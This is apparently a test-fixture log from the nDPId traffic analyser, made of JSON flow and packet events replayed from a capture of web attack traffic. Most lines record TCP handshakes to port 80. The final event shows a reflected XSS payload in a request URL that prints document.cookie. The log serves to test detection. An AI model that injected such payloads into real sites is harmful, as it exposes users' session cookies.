-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347943146,"flow_last_seen":1499347948885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347943146,"flow_last_seen":1499347948885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347944440,"flow_last_seen":1499347949885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347944440,"flow_last_seen":1499347949885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348060913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348061684,"flow_last_seen":1499348061684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348061684,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35560,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":1,"flow_last_seen":1499348061684,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348061684,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8R+ZAAD4GfeqsEAABwKgKMoroAFA+FlOsAAAAAKACchAsggAAAgQFtAQCCAoBPRRKAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":2,"flow_last_seen":1499348061684,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348061684,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiuhWb4DgPhZTraAScSBsbAAAAgQFtAQCCAoD5uW+AT0USgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9064,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":640,"flow_packet_id":3,"flow_last_seen":1499348061685,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348061685,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0R+dAAD4GffGsEAABwKgKMoroAFA+FlOtVm+A4YAQAOULdAAAAQEICgE9FEoD5uW+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9083,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348064243,"flow_last_seen":1499348064243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348064243,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35586,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9083,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":1,"flow_last_seen":1499348064243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348064243,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Y\/tAAD4GYdWsEAABwKgKMosCAFBtqHUxAAAAAKACchDY0AAAAgQFtAQCCAoBPRbKAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9084,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":2,"flow_last_seen":1499348064243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348064243,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiwKN0\/hjbah1MqAScSBnUwAAAgQFtAQCCAoD5ug+AT0WygEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":641,"flow_packet_id":3,"flow_last_seen":1499348064244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348064244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Y\/xAAD4GYdysEAABwKgKMosCAFBtqHUyjdP4ZIAQAOUGWwAAAQEICgE9FsoD5ug+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348065546,"flow_last_seen":1499348065546,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348065546,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":1,"flow_last_seen":1499348065546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348065546,"pkt":"ABm5CmnxAMGxFOsxCABFAAA882RAAD4G0musEAABwKgKMosQAFA77ut0AAAAAKACchCS8wAAAgQFtAQCCAoBPRgQAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":2,"flow_last_seen":1499348065547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348065547,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQixCTY4b2O+7rdaAScSCMDQAAAgQFtAQCCAoD5umEAT0YEAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":642,"flow_packet_id":3,"flow_last_seen":1499348065547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348065547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA082VAAD4G0nKsEAABwKgKMosQAFA77ut1k2OG94AQAOUrFQAAAQEICgE9GBAD5umE"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348068136,"flow_last_seen":1499348068136,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348068136,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":1,"flow_last_seen":1499348068136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348068136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8f2xAAD4GRmSsEAABwKgKMosqAFAaVGX7AAAAAKACchA3ZgAAAgQFtAQCCAoBPRqXAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":2,"flow_last_seen":1499348068136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348068136,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiyoM4+ekGlRl\/KAScSBTywAAAgQFtAQCCAoD5uwLAT0alwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9118,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_packet_id":3,"flow_last_seen":1499348068136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348068136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0f21AAD4GRmusEAABwKgKMosqAFAaVGX8DOPnpYAQAOXy0gAAAQEICgE9GpcD5uwL"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9125,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348069426,"flow_last_seen":1499348069426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348069426,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35640,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9125,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1499348069426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348069426,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86kVAAD4G24qsEAABwKgKMos4AFDyvfGfAAAAAKACchDSBgAAAgQFtAQCCAoBPRvaAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9126,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":2,"flow_last_seen":1499348069426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348069426,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiziWvrte8r3xoKAScSCPkwAAAgQFtAQCCAoD5u1OAT0b2gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":3,"flow_last_seen":1499348069427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348069427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06kZAAD4G25GsEAABwKgKMos4AFDyvfGglr67X4AQAOUumwAAAQEICgE9G9oD5u1O"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348070791,"flow_last_seen":1499348070791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070791,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35654,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1499348070791,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348070791,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jQtAAD4GOMWsEAABwKgKMotGAFAklpAkAAAAAKACchAARwAAAgQFtAQCCAoBPR0vAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":2,"flow_last_seen":1499348070791,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348070791,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi0aOH7cfJJaQJaAScSDJXAAAAgQFtAQCCAoD5u6jAT0dLwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":3,"flow_last_seen":1499348070792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348070792,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jQxAAD4GOMysEAABwKgKMotGAFAklpAljh+3IIAQAOVoZAAAAQEICgE9HS8D5u6j"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347948293,"flow_last_seen":1499347953886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347948293,"flow_last_seen":1499347953886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347949587,"flow_last_seen":1499347954886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347949587,"flow_last_seen":1499347954886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347952161,"flow_last_seen":1499347957887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34412,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347952161,"flow_last_seen":1499347957887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34412,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347953439,"flow_last_seen":1499347958887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34426,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347953439,"flow_last_seen":1499347958887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347954738,"flow_last_seen":1499347959887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347954738,"flow_last_seen":1499347959887,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347945720,"flow_last_seen":1499347950886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9146,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347945720,"flow_last_seen":1499347950886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348070917,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348072088,"flow_last_seen":1499348072088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348072088,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1499348072088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348072088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DYZAAD4GuEqsEAABwKgKMotUAFAOsRP1AAAAAKACchCRCQAAAgQFtAQCCAoBPR5zAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":2,"flow_last_seen":1499348072088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348072088,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQi1Q00\/Q8DrET9qAScSB1CgAAAgQFtAQCCAoD5u\/nAT0ecwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":3,"flow_last_seen":1499348072089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348072089,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DYdAAD4GuFGsEAABwKgKMotUAFAOsRP2NNP0PYAQAOUUEgAAAQEICgE9HnMD5u\/n"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9155,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348068136,"flow_last_seen":1499348072090,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499348072090,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35626,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27KGE8ES9SCQ7FORY5VSPTYY4R4UHJNRQTPTAY6L9JR1OU40RPDA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 